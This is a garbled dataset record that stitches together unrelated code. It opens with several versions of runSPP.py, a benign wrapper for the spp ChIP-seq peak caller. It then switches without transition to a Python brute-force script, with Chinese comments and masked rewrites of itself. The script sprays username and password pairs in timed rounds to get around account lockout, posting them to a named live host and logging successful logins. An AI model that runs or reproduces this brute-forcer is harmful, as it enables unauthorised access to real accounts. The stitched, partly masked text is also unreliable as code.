"step-2": "<mask token>\n\n\ndef bamToBed(infile, outfile):\n \"\"\"convert bam to bed with bedtools.\"\"\"\n statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()\n E.debug(\"executing statement '%s'\" % statement)\n retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)\n if retcode < 0:\n raise OSError('Child was terminated by signal %i: \\n%s\\n' % (-\n retcode, statement))\n return outfile\n\n\n<mask token>\n\n\ndef iteratePeaks(infile):\n \"\"\"iterate of zinba peaks in infile.\"\"\"\n for line in infile:\n if line.startswith('#'):\n continue\n if line.startswith('PEAKID\\tChrom'):\n continue\n if line.startswith('\\n'):\n continue\n data = line[:-1].split('\\t')\n if len(data) != 12:\n raise ValueError('could not parse line %s' % line)\n data[2] = max(int(data[2]) - 1, 0)\n data[3] = int(data[3])\n data[5] = float(data[5])\n data[6] = max(int(data[6]) - 1, 0)\n data[7] = int(data[7])\n data[8] = max(int(data[8]) - 1, 0)\n data[9] = int(data[9])\n data[10] = int(data[10])\n data[11] = float(data[11])\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n if not argv:\n argv = sys.argv\n parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[\n '__doc__'])\n parser.add_option('-f', '--input-format', dest='input_format', type=\n 'choice', choices=('bam',), help=\n 'input file format [default=%default].')\n parser.add_option('-w', '--window-size', dest='window_size', type='int',\n help='window size [default=%default].')\n parser.add_option('-c', '--control-filename', dest='control_filename',\n type='string', help=\n 'filename of input/control data in bed format [default=%default].')\n parser.add_option('-t', '--threads', dest='threads', type='int', help=\n 'number of threads to use [default=%default].')\n parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=\n 'float', help='fdr threshold [default=%default].')\n parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=\n 'float', help='z threshold [default=%default].')\n parser.add_option('--bin', dest='bin', type='int', help=\n 'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'\n )\n parser.add_option('--spp-srange-min', dest='srange_min', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.add_option('--spp-srange-max', dest='srange_max', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,\n window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,\n z_threshold=3)\n options, args = E.start(parser, argv=argv)\n if len(args) != 2:\n raise ValueError(\n 'please specify a filename with sample data and an output file')\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n R.library('spp')\n R.library('snow')\n E.info('reading data')\n R(\"chip.data <- read.bam.tags('%s')\" % filename_sample)\n R(\"input.data <- read.bam.tags('%s')\" % filename_control)\n R('cluster = makeCluster( %i )' % options.threads)\n E.info('computing binding characteristics')\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R(\n \"\"\"binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);\"\"\"\n % locals())\n options.stdout.write('shift\\t%i\\n' % R('binding.characteristics$peak$x')[0]\n )\n E.info('plot cross correlation profile')\n R('pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)' % filename_output)\n R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')\n R(\"\"\"plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");\"\"\"\n )\n R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')\n R('dev.off();')\n E.info('selecting informative tags based on the binding characteristics')\n R(\"\"\"chip.data <- select.informative.tags(\n chip.data,binding.characteristics);\"\"\"\n )\n R(\"\"\"input.data <- select.informative.tags(\n input.data,binding.characteristics);\"\"\"\n )\n E.info('outputting broad peaks')\n window_size, z_threshold = options.window_size, options.z_threshold\n R(\n \"\"\"broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))\"\"\"\n % locals())\n R('write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")' %\n filename_output)\n R('detection.window.halfsize <- binding.characteristics$whs;')\n E.info('determining binding positions using wtd method')\n fdr = options.fdr_threshold\n R(\n \"\"\"bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)\"\"\"\n % locals())\n options.stdout.write('detected_peaks\\t%i\\n' % R(\n 'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])\n R('output.binding.results(bp,\"%s.summit.txt\");' % filename_output)\n R(\n \"\"\"bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)\"\"\"\n % locals())\n R('write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")' % filename_output)\n E.stop()\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n",
"step-3": "<mask token>\n\n\ndef bamToBed(infile, outfile):\n \"\"\"convert bam to bed with bedtools.\"\"\"\n statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()\n E.debug(\"executing statement '%s'\" % statement)\n retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)\n if retcode < 0:\n raise OSError('Child was terminated by signal %i: \\n%s\\n' % (-\n retcode, statement))\n return outfile\n\n\nSPPPeak = collections.namedtuple('SPPPeak',\n 'contig unrefined_start unrefined_end strand posterior summit height refined_start refined_end median fdr'\n )\n\n\ndef iteratePeaks(infile):\n \"\"\"iterate of zinba peaks in infile.\"\"\"\n for line in infile:\n if line.startswith('#'):\n continue\n if line.startswith('PEAKID\\tChrom'):\n continue\n if line.startswith('\\n'):\n continue\n data = line[:-1].split('\\t')\n if len(data) != 12:\n raise ValueError('could not parse line %s' % line)\n data[2] = max(int(data[2]) - 1, 0)\n data[3] = int(data[3])\n data[5] = float(data[5])\n data[6] = max(int(data[6]) - 1, 0)\n data[7] = int(data[7])\n data[8] = max(int(data[8]) - 1, 0)\n data[9] = int(data[9])\n data[10] = int(data[10])\n data[11] = float(data[11])\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n if not argv:\n argv = sys.argv\n parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[\n '__doc__'])\n parser.add_option('-f', '--input-format', dest='input_format', type=\n 'choice', choices=('bam',), help=\n 'input file format [default=%default].')\n parser.add_option('-w', '--window-size', dest='window_size', type='int',\n help='window size [default=%default].')\n parser.add_option('-c', '--control-filename', dest='control_filename',\n type='string', help=\n 'filename of input/control data in bed format [default=%default].')\n parser.add_option('-t', '--threads', dest='threads', type='int', help=\n 'number of threads to use [default=%default].')\n parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=\n 'float', help='fdr threshold [default=%default].')\n parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=\n 'float', help='z threshold [default=%default].')\n parser.add_option('--bin', dest='bin', type='int', help=\n 'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'\n )\n parser.add_option('--spp-srange-min', dest='srange_min', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.add_option('--spp-srange-max', dest='srange_max', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,\n window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,\n z_threshold=3)\n options, args = E.start(parser, argv=argv)\n if len(args) != 2:\n raise ValueError(\n 'please specify a filename with sample data and an output file')\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n R.library('spp')\n R.library('snow')\n E.info('reading data')\n R(\"chip.data <- read.bam.tags('%s')\" % filename_sample)\n R(\"input.data <- read.bam.tags('%s')\" % filename_control)\n R('cluster = makeCluster( %i )' % options.threads)\n E.info('computing binding characteristics')\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R(\n \"\"\"binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);\"\"\"\n % locals())\n options.stdout.write('shift\\t%i\\n' % R('binding.characteristics$peak$x')[0]\n )\n E.info('plot cross correlation profile')\n R('pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)' % filename_output)\n R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')\n R(\"\"\"plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");\"\"\"\n )\n R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')\n R('dev.off();')\n E.info('selecting informative tags based on the binding characteristics')\n R(\"\"\"chip.data <- select.informative.tags(\n chip.data,binding.characteristics);\"\"\"\n )\n R(\"\"\"input.data <- select.informative.tags(\n input.data,binding.characteristics);\"\"\"\n )\n E.info('outputting broad peaks')\n window_size, z_threshold = options.window_size, options.z_threshold\n R(\n \"\"\"broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))\"\"\"\n % locals())\n R('write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")' %\n filename_output)\n R('detection.window.halfsize <- binding.characteristics$whs;')\n E.info('determining binding positions using wtd method')\n fdr = options.fdr_threshold\n R(\n \"\"\"bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)\"\"\"\n % locals())\n options.stdout.write('detected_peaks\\t%i\\n' % R(\n 'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])\n R('output.binding.results(bp,\"%s.summit.txt\");' % filename_output)\n R(\n \"\"\"bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)\"\"\"\n % locals())\n R('write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")' % filename_output)\n E.stop()\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n",
"step-4": "<mask token>\nimport os\nimport sys\nimport subprocess\nimport collections\nfrom cgatcore import experiment as E\nfrom rpy2.robjects import r as R\n\n\ndef bamToBed(infile, outfile):\n \"\"\"convert bam to bed with bedtools.\"\"\"\n statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()\n E.debug(\"executing statement '%s'\" % statement)\n retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)\n if retcode < 0:\n raise OSError('Child was terminated by signal %i: \\n%s\\n' % (-\n retcode, statement))\n return outfile\n\n\nSPPPeak = collections.namedtuple('SPPPeak',\n 'contig unrefined_start unrefined_end strand posterior summit height refined_start refined_end median fdr'\n )\n\n\ndef iteratePeaks(infile):\n \"\"\"iterate of zinba peaks in infile.\"\"\"\n for line in infile:\n if line.startswith('#'):\n continue\n if line.startswith('PEAKID\\tChrom'):\n continue\n if line.startswith('\\n'):\n continue\n data = line[:-1].split('\\t')\n if len(data) != 12:\n raise ValueError('could not parse line %s' % line)\n data[2] = max(int(data[2]) - 1, 0)\n data[3] = int(data[3])\n data[5] = float(data[5])\n data[6] = max(int(data[6]) - 1, 0)\n data[7] = int(data[7])\n data[8] = max(int(data[8]) - 1, 0)\n data[9] = int(data[9])\n data[10] = int(data[10])\n data[11] = float(data[11])\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n if not argv:\n argv = sys.argv\n parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[\n '__doc__'])\n parser.add_option('-f', '--input-format', dest='input_format', type=\n 'choice', choices=('bam',), help=\n 'input file format [default=%default].')\n parser.add_option('-w', '--window-size', dest='window_size', type='int',\n help='window size [default=%default].')\n parser.add_option('-c', '--control-filename', dest='control_filename',\n type='string', help=\n 'filename of input/control data in bed format [default=%default].')\n parser.add_option('-t', '--threads', dest='threads', type='int', help=\n 'number of threads to use [default=%default].')\n parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=\n 'float', help='fdr threshold [default=%default].')\n parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=\n 'float', help='z threshold [default=%default].')\n parser.add_option('--bin', dest='bin', type='int', help=\n 'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'\n )\n parser.add_option('--spp-srange-min', dest='srange_min', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.add_option('--spp-srange-max', dest='srange_max', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,\n window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,\n z_threshold=3)\n options, args = E.start(parser, argv=argv)\n if len(args) != 2:\n raise ValueError(\n 'please specify a filename with sample data and an output file')\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n R.library('spp')\n R.library('snow')\n E.info('reading data')\n R(\"chip.data <- read.bam.tags('%s')\" % filename_sample)\n R(\"input.data <- read.bam.tags('%s')\" % filename_control)\n R('cluster = makeCluster( %i )' % options.threads)\n E.info('computing binding characteristics')\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R(\n \"\"\"binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);\"\"\"\n % locals())\n options.stdout.write('shift\\t%i\\n' % R('binding.characteristics$peak$x')[0]\n )\n E.info('plot cross correlation profile')\n R('pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)' % filename_output)\n R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')\n R(\"\"\"plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");\"\"\"\n )\n R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')\n R('dev.off();')\n E.info('selecting informative tags based on the binding characteristics')\n R(\"\"\"chip.data <- select.informative.tags(\n chip.data,binding.characteristics);\"\"\"\n )\n R(\"\"\"input.data <- select.informative.tags(\n input.data,binding.characteristics);\"\"\"\n )\n E.info('outputting broad peaks')\n window_size, z_threshold = options.window_size, options.z_threshold\n R(\n \"\"\"broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))\"\"\"\n % locals())\n R('write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")' %\n filename_output)\n R('detection.window.halfsize <- binding.characteristics$whs;')\n E.info('determining binding positions using wtd method')\n fdr = options.fdr_threshold\n R(\n \"\"\"bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)\"\"\"\n % locals())\n options.stdout.write('detected_peaks\\t%i\\n' % R(\n 'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])\n R('output.binding.results(bp,\"%s.summit.txt\");' % filename_output)\n R(\n \"\"\"bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)\"\"\"\n % locals())\n R('write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")' % filename_output)\n E.stop()\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n",
"step-5": "'''\nrunSPP.py - wrap spp peak caller\n========================================\n\n:Tags: Python\n\nPurpose\n-------\n\nRuns the spp peak caller.\n\nThe workflow follows the tutorial at:\n\nhttp://compbio.med.harvard.edu/Supplements/ChIP-seq/tutorial.html\n\nUsage\n-----\n\nDocumentation\n-------------\n\nRequirements:\n\n* spp >= ?\n* snow >= 0.3.13\n* bedtools >= 2.21.0\n\nCode\n----\n\n'''\n\nimport os\nimport sys\nimport subprocess\nimport collections\n\nfrom cgatcore import experiment as E\n\nfrom rpy2.robjects import r as R\n\n\ndef bamToBed(infile, outfile):\n '''convert bam to bed with bedtools.'''\n\n statement = \"bamToBed -i %(infile)s > %(outfile)s\" % locals()\n\n E.debug(\"executing statement '%s'\" % statement)\n\n retcode = subprocess.call(statement,\n cwd=os.getcwd(),\n shell=True)\n if retcode < 0:\n raise OSError(\"Child was terminated by signal %i: \\n%s\\n\" %\n (-retcode, statement))\n\n return outfile\n\nSPPPeak = collections.namedtuple(\n \"SPPPeak\",\n \"contig unrefined_start unrefined_end strand \"\n \"posterior summit height refined_start refined_end median fdr\")\n\n\ndef iteratePeaks(infile):\n '''iterate of zinba peaks in infile.'''\n\n for line in infile:\n\n if line.startswith(\"#\"):\n continue\n if line.startswith(\"PEAKID\\tChrom\"):\n continue\n # skip empty lines\n if line.startswith(\"\\n\"):\n continue\n\n data = line[:-1].split(\"\\t\")\n\n if len(data) != 12:\n raise ValueError(\"could not parse line %s\" % line)\n\n # I assume these are 1-based coordinates\n data[2] = max(int(data[2]) - 1, 0)\n # end\n data[3] = int(data[3])\n # posterior\n data[5] = float(data[5])\n # summit\n data[6] = max(int(data[6]) - 1, 0)\n # height\n data[7] = int(data[7])\n # refined_start\n data[8] = max(int(data[8]) - 1, 0)\n # end\n data[9] = int(data[9])\n # median\n data[10] = int(data[10])\n # qvalue\n data[11] = float(data[11])\n\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n\n if not argv:\n argv = sys.argv\n\n # setup command line parser\n parser = E.OptionParser(version=\"%prog version: $Id$\",\n usage=globals()[\"__doc__\"])\n\n parser.add_option(\"-f\", \"--input-format\", dest=\"input_format\",\n type=\"choice\",\n choices=(\"bam\",),\n help=\"input file format [default=%default].\")\n\n parser.add_option(\"-w\", \"--window-size\", dest=\"window_size\", type=\"int\",\n help=\"window size [default=%default].\")\n\n parser.add_option(\"-c\", \"--control-filename\",\n dest=\"control_filename\",\n type=\"string\",\n help=\"filename of input/control data in \"\n \"bed format [default=%default].\")\n\n parser.add_option(\"-t\", \"--threads\", dest=\"threads\", type=\"int\",\n help=\"number of threads to use [default=%default].\")\n\n parser.add_option(\"-q\", \"--fdr-threshold\",\n dest=\"fdr_threshold\", type=\"float\",\n help=\"fdr threshold [default=%default].\")\n\n parser.add_option(\"-z\", \"--spp-z-threshold\", dest=\"z_threshold\", type=\"float\",\n help=\"z threshold [default=%default].\")\n\n parser.add_option(\"--bin\", dest=\"bin\", type=\"int\",\n help=\"bin tags within the specified number \"\n \" of basepairs to speed up calculation;\"\n \" increasing bin size decreases the accuracy \"\n \"of the determined parameters [default=%default]\")\n\n parser.add_option(\"--spp-srange-min\", dest=\"srange_min\", type=\"float\",\n help=\"srange gives the possible range for the \"\n \" size of the protected region;\"\n \" srange should be higher than tag length; \"\n \" making the upper boundary too high\"\n \" will increase calculation time [%default]\")\n\n parser.add_option(\"--spp-srange-max\", dest=\"srange_max\", type=\"float\",\n help=\"srange gives the possible range for the \"\n \" size of the protected region;\"\n \" srange should be higher than tag length; \"\n \" making the upper boundary too high\"\n \" will increase calculation time [%default]\")\n\n parser.set_defaults(\n input_format=\"bam\",\n threads=1,\n fdr_threshold=0.05,\n window_size=1000,\n offset=125,\n srange_min=50,\n srange_max=500,\n bin=5,\n z_threshold=3,\n )\n\n # add common options (-h/--help, ...) and parse command line\n (options, args) = E.start(parser, argv=argv)\n\n if len(args) != 2:\n raise ValueError(\n \"please specify a filename with sample data and an output file\")\n\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n\n # load Zinba\n R.library('spp')\n R.library('snow')\n\n # read data\n E.info(\"reading data\")\n R('''chip.data <- read.bam.tags('%s')''' % filename_sample)\n R('''input.data <- read.bam.tags('%s')''' % filename_control)\n R('''cluster = makeCluster( %i )''' % (options.threads))\n\n E.info(\"computing binding characteristics\")\n # get binding info from cross-correlation profile\n\n # srange gives the possible range for the size of the protected region;\n # srange should be higher than tag length; making the upper boundary too\n # high will increase calculation time\n\n # bin - bin tags within the specified number of basepairs to speed\n # up calculation; increasing bin size decreases the accuracy of\n # the determined parameters\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R('''binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);''' % locals())\n # print out binding peak separation distance\n options.stdout.write(\n \"shift\\t%i\\n\" % R('''binding.characteristics$peak$x''')[0])\n\n ##################################################\n ##################################################\n ##################################################\n E.info(\"plot cross correlation profile\")\n # plot cross-correlation profile\n R('''pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)''' %\n filename_output)\n R('''par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);''')\n R('''plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");''')\n R('''abline(v=binding.characteristics$peak$x,lty=2,col=2)''')\n R('''dev.off();''')\n\n E.info(\"selecting informative tags based on the binding characteristics\")\n # select informative tags based on the binding characteristics\n R('''chip.data <- select.informative.tags(\n chip.data,binding.characteristics);''')\n R('''input.data <- select.informative.tags(\n input.data,binding.characteristics);''')\n\n E.info(\"outputting broad peaks\")\n window_size, z_threshold = options.window_size, options.z_threshold\n R('''broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))''' % locals())\n # write out in broadPeak format\n R('''write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")''' %\n filename_output)\n\n # binding detection parameters desired FDR (1%). Alternatively, an\n # E-value can be supplied to the method calls below instead of the\n # fdr parameter the binding.characteristics contains the optimized\n # half-size for binding detection window\n R('''detection.window.halfsize <- binding.characteristics$whs;''')\n\n # determine binding positions using wtd method\n E.info(\"determining binding positions using wtd method\")\n fdr = options.fdr_threshold\n R('''bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)''' % locals())\n options.stdout.write(\"detected_peaks\\t%i\\n\" % R(\n '''sum(unlist(lapply(bp$npl,function(d) length(d$x))))''')[0])\n\n # output detected binding positions\n R('''output.binding.results(bp,\"%s.summit.txt\");''' % filename_output)\n\n R('''bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)''' % locals())\n # output using narrowPeak format\n R('''write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")''' %\n filename_output)\n\n # write footer and output benchmark information.\n E.stop()\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import argparse
import requests
from ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username
from random import choice
from time import sleep
MAX_ROUND = 3 # 爆破的轮数
curr_round = 0 # 当前的轮数
sleep_time = 2 # 每一轮休眠的秒数
def login_limit_user():
"""
登录函数
"""
try:
login_info = dict_queue.get(block=False)
except Exception as e:
print("[Error] {0}".format(repr(e)))
return
username = login_info[0]
# 如果这个用户名已经被爆破出来密码,那么跳过这个用户名
if username in success_username:
return
password = login_info[1]
# 登录
payload = {
"username": username,
"password": password,
}
print('开始尝试用户名:{},密码:{}'.format(username,password))
# url = "http://127.0.0.1:8000/user/login-block-account/?referer=/"
url = "http://ss.gentlecp.com:40000/user/login-block-account/?referer=/"
r = requests.post(url, data=payload)
# 判断是否登录成功
if r.status_code == 200:
msg = login_info
success_str = "欢迎访问GentleCP的网站"
if success_str in r.text:
# 登录成功则把登录信息保存到success_queue
success_queue.put(msg)
# 把登录成功的用户名添加到 success_username中,之后可以跳过这个用户名的密码的爆破
success_username.append(username)
print("[INFO] success: ", msg)
# 如果想要爆破出来一个密码就立刻停止爆破,那么此处调用函数stop_brute,反之则注释此处
# stop_brute()
def get_dict(dict_user, dict_pass):
"""
生成字典队列
:return:
"""
with open("dict/{}".format(dict_user)) as f:
username = [line.strip() for line in f.readlines()]
with open('dict/{}'.format(dict_pass)) as f:
passwords = [line.strip() for line in f.readlines()]
count = 0
for u in username:
# 每一轮都换下一个密码
p = passwords[curr_round % len(passwords)]
count += 1
pair = (u, p)
dict_queue.put(pair)
print("字典生成完成,长度 {}".format(count))
def get_parse() -> dict:
parser = argparse.ArgumentParser()
parser.add_argument("--username", "-u", help="用户名字典")
parser.add_argument("--password", "-p", help="密码字典")
dic = vars(parser.parse_args())
return dic
def print_result():
"""
打印爆破的结果
"""
success = []
while not success_queue.empty():
success.append(success_queue.get())
print("\n[INFO] 爆破结果: ", success)
if __name__ == "__main__":
args = get_parse()
dict_username = args.get('dict_username', "username.txt")
dict_password = args.get('dict_password', "password.txt")
for curr_round in range(0, MAX_ROUND):
print("[INFO] 开始第{0}轮爆破".format(curr_round))
get_dict(dict_username, dict_password)
bruteforce(login_limit_user, thread_num=5)
print("[INFO] Sleep.")
sleep(2)
print_result()
|
normal
|
{
"blob_id": "94286fc36e06598b9faa65d9e5759f9518e436c6",
"index": 7979,
"step-1": "<mask token>\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\nif __name__ == '__main__':\n args = get_parse()\n dict_username = args.get('dict_username', 'username.txt')\n dict_password = args.get('dict_password', 'password.txt')\n for curr_round in range(0, MAX_ROUND):\n print('[INFO] 开始第{0}轮爆破'.format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print('[INFO] Sleep.')\n sleep(2)\n print_result()\n",
